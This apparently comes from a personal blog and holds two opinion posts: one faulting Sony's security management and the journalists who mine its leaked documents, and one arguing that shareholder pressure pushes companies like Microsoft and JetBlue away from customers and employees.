Sony’s lawyers recently sent several publications a cease & desist letter, to get reporters to stop publishing the leaked information, since Sony “does not consent to your possession, review, copying, dissemination, publication, uploading, downloading or making any use” of the documents. There’s been quite a stir that in doing this, Sony is likely invoking the Streisand effect, and it will probably not only backfire, but result in more, not less, coverage of the information.

In information available long before the breach, Sony’s executive director of information security was quoted as saying, “it’s a valid business decision to accept the risk” of a security breach. “I will not invest $10 million to avoid a possible $1 million loss”. Given that sort of security posture, it’s not surprising that even though he was able to talk an auditor out of dinging them for SOX compliance, Sony organizations have faced not one, but two rather devastating hacks in recent years.

So it would seem that Sony’s management is likely to blame for leaving doors open by reinforcing poor security practices and actually fighting back against well-intentioned compliance efforts (thus reinforcing what I’ve long said, “Compliance and security can go hand in hand. But security is never achieved by stamping a system as ‘compliant’.”)

It’s also obvious that the group that hacked into Sony (perhaps with the assistance of either existing or previous employees), compromised confidential information and destroyed systems deserves a huge amount of blame in terms of the negative effects Sony is currently experiencing. Again, if Sony had proper security in place (and execs more interested in security than rubber-stamping systems), perhaps these people wouldn’t have stood a chance. In terms of media coverage, this is what I’d like to know more about. Who actually broke in?

However, years from now, when people are looking back at the broad damage caused by the breach and the leaked information, I believe it’ll be important to really note who caused the most damage to Sony over the long run. Yes, the people who broke in started it all. But the damage being caused by journalists taking advantage of the document dumps is, and will continue to be, significant. For myself, from now on, I’m only linking to and reposting articles that appear to use information that has not been sourced from the breach.

I’m no longer feeding the clickbait machine that enthusiastically awaits the next doc drop of Sony confidential information, like a vulture ready to pick at them while they’re weak, and expose the inner dysfunction of an organization (not something unique to Sony – every org has some level of dysfunction).

On Twitter this morning, I pondered whether the NYT would be so enthusiastic and supportive about the journalistic value of confidential info that was regularly being pushed out by hackers if they themselves had been breached, and it was their secrets, their dysfunction, their personal information, their source lists that were being taken advantage of to generate ad views.

For some reason, I have to think the answer is no. So why are journalists so enthusiastic about kicking Sony while they’re down after a breach?


03
Dec 14

Shareholder Shackles

Recently, Michael Dell wrote about the after-effects of taking his company private. I think his words are quite telling:

“I’d say we got it right. Privatization has unleashed the passion of our team members who have the freedom to focus first on innovating for customers in a way that was not always possible when striving to meet the quarterly demands of Wall Street.”, and “The single most important thing a company can do is invest and innovate to help customers succeed…”

Early on in my career at Microsoft, executives would often exclaim “our employees are our best asset.” By the time I left in 2004, however, it was pointedly clear that “shareholder value!” was the priority of the day. Problem is, most underling employees aren’t significant shareholders. In essence, executive leadership’s number one priority wasn’t building great products or retaining great employees, but in making money for shareholders. That’s toxic.

I distinctly recall the day that SteveB held an all-hands meeting where the move to deliver a dividend was announced for the first time in 2003. He was ecstatic, as he should have been. It was a huge jab in the side of institutional investors that had been pushing him to pass on the cash hoard to them. Being the second most significant shareholder at the time, it of course was a windfall for him, financially.

But most employees? They held some stock, sure. But not massive quantities. So this was, in effect, taking the cash that employees had worked their asses off to earn, and chucking it out at shareholders, whose most significant investment had been cash to try and keep the stock, stuck in a dead calm for years (and for years after), moving up.

After Steve announced the dividend in the “town hall” meeting that day, he asked if there were any questions from the room full of employees physically present there. There were no questions. Literally zero questions. For some reason, he seemed surprised.

I was watching the event from my office with a colleague, now also separated from Microsoft. I turned to him and asked, “Do you know why there are no questions?” He replied “no”, and I stated, “because this change he just announced means effectively nothing to more than 95% of the people in that room.”

I’m not a big fan of the stock market – especially on short-term investments. I’m okay with you getting a return on a longer-term investment that you’ve held while a company grows. I think market pressures can lead a company to prioritize and deemphasize the wrong things just to appease the vocal masses. Fire a CEO and lose their institutional knowledge? SURE! (Not that every CEO change is all good or all bad.) Give you the cash instead of investing it in new products, technologies, people and processes to grow the business? SURE! But I’m really not a fan of fair-weather shareholders coming along and pushing for cash back on an investment they just made. Employees sweat their asses off for years building the business in order to get equity that takes years again to vest, and shareholders get the cash for doing almost nothing. Alrighty then. That makes sense.

While Tim Cook has taken some steps to appease certain drive-by activist investors who bloviate about wanting more cash through more significant dividends or bigger buybacks, he has pushed back as well, and has also been explicitly outspoken when people challenge the company’s priorities.

One can argue that Microsoft’s flat stock price from 2001-2013 was the cause of the reprioritization and capitulation to investors, but one can also argue that significant holdings by executives could also have tainted the priorities to focus on shareholder value rather than innovation.

While Microsoft’s financial results do generally continue to move in a positive direction, I personally worry that too much of that growth could be coming in part with price increases, not with net-new sales. It’s always hard to decode which is which, as prices have generally been rising, and underlying numbers generating them aren’t always terrifically clear to decode (I’m being kind).

As organizations grow, and sales get tight, you have two choices to make money. You 1) get new customers, or 2) charge your existing customers more.

The first position is easy, as long as you’re experiencing organic sales to new customers, or you’re adding new products and services that don’t completely replace, but can and likely do erode, prior products in order to deliver longer-term growth opportunities for the business as a whole.

Most companies, over time, plateau and move into the second position and have to tighten the belt. It just happens. There’s just only so far you can go in terms of obtaining new customers for your existing products and services or building new products and services that risk your existing lines. This is far from unique to Microsoft. It’s a common occurrence. As this article in The New Yorker shows, United is doing this as well (and they’re certainly not alone). Even JetBlue is facing the music and chopping up their previously equitable seating plans to accommodate a push for earnings growth.

Read that last section quoting Hayes very carefully again: “long-term plan to drive shareholder returns through new and existing initiatives.” and “We believe the plan laid out today benefits our three key stakeholders … It delivers improved, sustainable profitability for our investors, the best travel experience for our customers and ensures a strong, healthy company for our crewmembers.”

Just breathe in those priorities for a moment. It’s not about the customers that pay the bills (and he left out “our highest paying” in the statement about customers). It’s not about the employees that keep the planes flying and on time. Nope. It’s about shareholder value. Effectively all about shareholder value. I would argue those priorities are completely ass-backwards. I’m also not sure I concur that it ensures a strong, healthy company for the long term, either. JetBlue has many dedicated fliers due to the distinct premium, but price-conscious product it has delivered from the beginning. JetBlue will find themselves with great difficulty retaining existing customers. Sure, they’ll make money. But a lot of people who used to prefer JetBlue are now likely to not be so preferential.

My personal opinion is that Michael Dell is spot on – the benefit of being a private company is that, now that he survived the ordeal of re-privatizing his company, he can ignore the market at large, and do what’s best for the company. Rather than focusing on short-term goals quarter to quarter, and worrying about a certain year’s fourth quarter being slightly down over the previous year’s, he, his leadership team, and his employees can focus on building products and services that customers will buy because they solve a problem for them.

I worry about a world where the “effectiveness” of a CEO is in any way judged by the stock price. It’s a bullshit measurement. Price growth doesn’t gauge whether the company will be alive or dead in 5, 10, or 15 years. It doesn’t gauge whether a CEO is willing to put a product line on a funeral pyre so a new one can grow in its place. Most importantly, it doesn’t gauge whether a company’s sales pipeline is organically growing or not in any form.

When you focus on just pleasing the cacophony of shareholders, you get hung up on driving earnings up at all costs. This is the price a public company faces.

When you focus on just driving earnings up at all costs, you get hung up on driving numbers that may well not be in line with the long-term goals of your company. This is the price a public company faces.

Build great products and services. Kick ass. Take names. Watch customers buy your tools to solve their problems. When shareholders with no immediate concern for your company other than how you’ll pad their wallet come knocking, as long as you’re making a profit, invest that cash in future growth for your company, and tell them you’re too busy building great things to talk.